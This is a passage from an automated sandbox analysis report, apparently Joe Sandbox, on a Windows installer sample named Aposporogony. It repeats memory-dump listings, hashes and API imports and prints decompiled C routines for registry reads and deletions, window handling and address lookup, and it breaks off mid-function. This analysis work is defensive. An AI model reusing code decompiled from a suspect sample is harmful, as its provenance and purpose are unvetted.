                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                      • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                                                                                      • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                                                                                                      • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                                                                                      • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                      			E00402484(int* __ebx, char* __esi) {
                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                      				short* _t18;
                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t35 = __esi;
                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                      				_t17 = E00402C81(_t40, 0x20019); // executed
                                                                                                                                                                                      				_t33 = _t17;
                                                                                                                                                                                      				_t18 = E00402C41(0x33);
                                                                                                                                                                                      				 *__esi = __ebx;
                                                                                                                                                                                      				if(_t33 == __ebx) {
                                                                                                                                                                                      					 *(_t37 - 4) = 1;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					 *(_t37 - 0x4c) = 0x800;
                                                                                                                                                                                      					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
                                                                                                                                                                                      						L7:
                                                                                                                                                                                      						 *_t35 = _t27;
                                                                                                                                                                                      						 *(_t37 - 4) = 1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						if( *(_t37 + 8) == 4) {
                                                                                                                                                                                      							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                                                                                                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                                                                                                                                      							E0040632F(__esi,  *__esi);
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                                                                                                      								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                                                                                                                                      								_t35[0x7fe] = _t27;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(_t33); // executed
                                                                                                                                                                                      					RegCloseKey(); // executed
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x00402484
                                                                                                                                                                                      0x00402484
                                                                                                                                                                                      0x00402489
                                                                                                                                                                                      0x00402490
                                                                                                                                                                                      0x00402492
                                                                                                                                                                                      0x00402499
                                                                                                                                                                                      0x0040249c
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x004024a2
                                                                                                                                                                                      0x004024a5
                                                                                                                                                                                      0x004024c0
                                                                                                                                                                                      0x004024f0
                                                                                                                                                                                      0x004024f0
                                                                                                                                                                                      0x004024f3
                                                                                                                                                                                      0x004024c2
                                                                                                                                                                                      0x004024c6
                                                                                                                                                                                      0x004024df
                                                                                                                                                                                      0x004024e6
                                                                                                                                                                                      0x004024e9
                                                                                                                                                                                      0x004024c8
                                                                                                                                                                                      0x004024cb
                                                                                                                                                                                      0x004024d6
                                                                                                                                                                                      0x0040254f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004024cb
                                                                                                                                                                                      0x004024c6
                                                                                                                                                                                      0x00402556
                                                                                                                                                                                      0x00402557
                                                                                                                                                                                      0x00402557
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm2525.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                                                      • Opcode ID: 21c665e14cc0d07f1df3d0a30a54dff651ecbc19d555ce2af5ddfe5b717b61b9
                                                                                                                                                                                      • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                                                                                                      • Opcode Fuzzy Hash: 21c665e14cc0d07f1df3d0a30a54dff651ecbc19d555ce2af5ddfe5b717b61b9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                                                                      			E00401389(signed int _a4) {
                                                                                                                                                                                      				intOrPtr* _t6;
                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                      				signed int _t17;
                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t17 = _a4;
                                                                                                                                                                                      				while(_t17 >= 0) {
                                                                                                                                                                                      					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                                                                                                                                      					if( *_t6 == 1) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(_t6); // executed
                                                                                                                                                                                      					_t8 = E00401434(); // executed
                                                                                                                                                                                      					if(_t8 == 0x7fffffff) {
                                                                                                                                                                                      						return 0x7fffffff;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t10 = E0040136D(_t8);
                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                      						_t11 = _t10 - 1;
                                                                                                                                                                                      						_t16 = _t17;
                                                                                                                                                                                      						_t17 = _t11;
                                                                                                                                                                                      						_t12 = _t11 - _t16;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t12 = _t10 + 1;
                                                                                                                                                                                      						_t17 = _t17 + 1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                                                                                      						 *0x42922c =  *0x42922c + _t12;
                                                                                                                                                                                      						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0); // executed
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x0040138a
                                                                                                                                                                                      0x004013fa
                                                                                                                                                                                      0x0040139b
                                                                                                                                                                                      0x004013a0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004013a2
                                                                                                                                                                                      0x004013a3
                                                                                                                                                                                      0x004013ad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401404
                                                                                                                                                                                      0x004013b0
                                                                                                                                                                                      0x004013b7
                                                                                                                                                                                      0x004013bd
                                                                                                                                                                                      0x004013be
                                                                                                                                                                                      0x004013c0
                                                                                                                                                                                      0x004013c2
                                                                                                                                                                                      0x004013b9
                                                                                                                                                                                      0x004013b9
                                                                                                                                                                                      0x004013ba
                                                                                                                                                                                      0x004013ba
                                                                                                                                                                                      0x004013c9
                                                                                                                                                                                      0x004013cb
                                                                                                                                                                                      0x004013f4
                                                                                                                                                                                      0x004013f4
                                                                                                                                                                                      0x004013c9
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E0040238E(void* __ebx) {
                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t14 = __ebx;
                                                                                                                                                                                      				_t26 =  *(_t23 - 0x18) - __ebx;
                                                                                                                                                                                      				_t20 =  *((intOrPtr*)(_t23 - 0x24));
                                                                                                                                                                                      				if( *(_t23 - 0x18) != __ebx) {
                                                                                                                                                                                      					_t18 = E00402CFF(_t20, E00402C41(0x22),  *(_t23 - 0x18) >> 1);
                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t10 = E00402C81(_t26, 2); // executed
                                                                                                                                                                                      					_t22 = _t10;
                                                                                                                                                                                      					if(_t22 == __ebx) {
                                                                                                                                                                                      						L6:
                                                                                                                                                                                      						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t18 = RegDeleteValueW(_t22, E00402C41(0x33));
                                                                                                                                                                                      						RegCloseKey(_t22);
                                                                                                                                                                                      						L4:
                                                                                                                                                                                      						if(_t18 != _t14) {
                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}









                                                                                                                                                                                      0x0040238e
                                                                                                                                                                                      0x0040238e
                                                                                                                                                                                      0x00402391
                                                                                                                                                                                      0x00402394
                                                                                                                                                                                      0x004023d5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402396
                                                                                                                                                                                      0x00402398
                                                                                                                                                                                      0x0040239d
                                                                                                                                                                                      0x004023a1
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x004023a7
                                                                                                                                                                                      0x004023b7
                                                                                                                                                                                      0x004023b9
                                                                                                                                                                                      0x004023d7
                                                                                                                                                                                      0x004023d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004023df
                                                                                                                                                                                      0x004023d9
                                                                                                                                                                                      0x004023a1
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseDeleteValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2831762973-0
                                                                                                                                                                                      • Opcode ID: e9091bd3c592c52f830fe5f0db365f859abd5374c654e73cb441bfea84df5a9a
                                                                                                                                                                                      • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                                                                                                      • Opcode Fuzzy Hash: e9091bd3c592c52f830fe5f0db365f859abd5374c654e73cb441bfea84df5a9a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                                                      • Opcode ID: 1a02374288937e462cbfdf7f0b84f8963b1ccabab36c0863b4787aba27791d3b
                                                                                                                                                                                      • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a02374288937e462cbfdf7f0b84f8963b1ccabab36c0863b4787aba27791d3b
                                                                                                                                                                                      • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00401573(void* __ebx) {
                                                                                                                                                                                      				int _t4;
                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                      				struct HWND__* _t11;
                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t9 = __ebx;
                                                                                                                                                                                      				_t11 =  *0x429210;
                                                                                                                                                                                      				if(_t11 != __ebx) {
                                                                                                                                                                                      					ShowWindow(_t11,  *(_t16 - 0x24)); // executed
                                                                                                                                                                                      					_t4 =  *(_t16 - 0x28);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t12 =  *0x429224;
                                                                                                                                                                                      				if(_t12 != _t9) {
                                                                                                                                                                                      					ShowWindow(_t12, _t4); // executed
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t16 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x00401573
                                                                                                                                                                                      0x00401573
                                                                                                                                                                                      0x00401581
                                                                                                                                                                                      0x00401587
                                                                                                                                                                                      0x00401589
                                                                                                                                                                                      0x00401589
                                                                                                                                                                                      0x0040158c
                                                                                                                                                                                      0x00401594
                                                                                                                                                                                      0x0040159c
                                                                                                                                                                                      0x0040159c
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                      • Opcode ID: 9396bd49178326bb94d1923b0c0b2eab2e4aeba0ae0bfe3e3dcbc748b8662462
                                                                                                                                                                                      • Instruction ID: ef276884cae6df4bdf80f3e37ee84ecc598c16bb3604b67bea3deab27b87eed6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9396bd49178326bb94d1923b0c0b2eab2e4aeba0ae0bfe3e3dcbc748b8662462
                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E0B876B10114EBCB24DB94ED9086D77A59748310764097AD501B3250DA75AD51CF78
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E004067C2(signed int _a4) {
                                                                                                                                                                                      				struct HINSTANCE__* _t5;
                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t10 = _a4 << 3;
                                                                                                                                                                                      				_t8 =  *(_t10 + 0x40a410);
                                                                                                                                                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                                                                      					L2:
                                                                                                                                                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                                                                                                                      				}
